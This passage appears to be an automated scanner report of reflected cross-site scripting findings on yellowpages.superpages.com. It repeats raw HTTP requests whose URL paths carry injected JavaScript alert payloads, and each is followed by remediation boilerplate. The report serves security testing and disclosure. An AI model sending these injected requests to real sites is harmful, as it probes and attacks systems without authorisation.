GET /common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
var actualUrl = "http://yellowpages.superpages.com/common/js/jquery.history_remote.jsdfa09"-alert(1)-"556c143ae67?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7dc5"-alert(1)-"f36372d39f5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commond7dc5"-alert(1)-"f36372d39f5/js/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c12c"-alert(1)-"1659686fb48 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js2c12c"-alert(1)-"1659686fb48/jquery.sptabs.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fc50d"-alert(1)-"069a0f815e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery.sptabs.jsfc50d"-alert(1)-"069a0f815e6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a2a7"-alert(1)-"fc51b2a718c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common9a2a7"-alert(1)-"fc51b2a718c/js/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48ee7"-alert(1)-"7ec2f5075e8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js48ee7"-alert(1)-"7ec2f5075e8/omniture_onclick.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df457"-alert(1)-"a7b7f4d7dfe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/omniture_onclick.jsdf457"-alert(1)-"a7b7f4d7dfe HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db562"-alert(1)-"02c46e9b05d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondb562"-alert(1)-"02c46e9b05d/js/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 442ba"-alert(1)-"a80008c80c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js442ba"-alert(1)-"a80008c80c5/recently_viewed.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 470ae"-alert(1)-"830ee1c48fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/recently_viewed.js470ae"-alert(1)-"830ee1c48fb HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539eb"-alert(1)-"4cc78ad7314 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common539eb"-alert(1)-"4cc78ad7314/js/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bb37a"-alert(1)-"32622685d4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
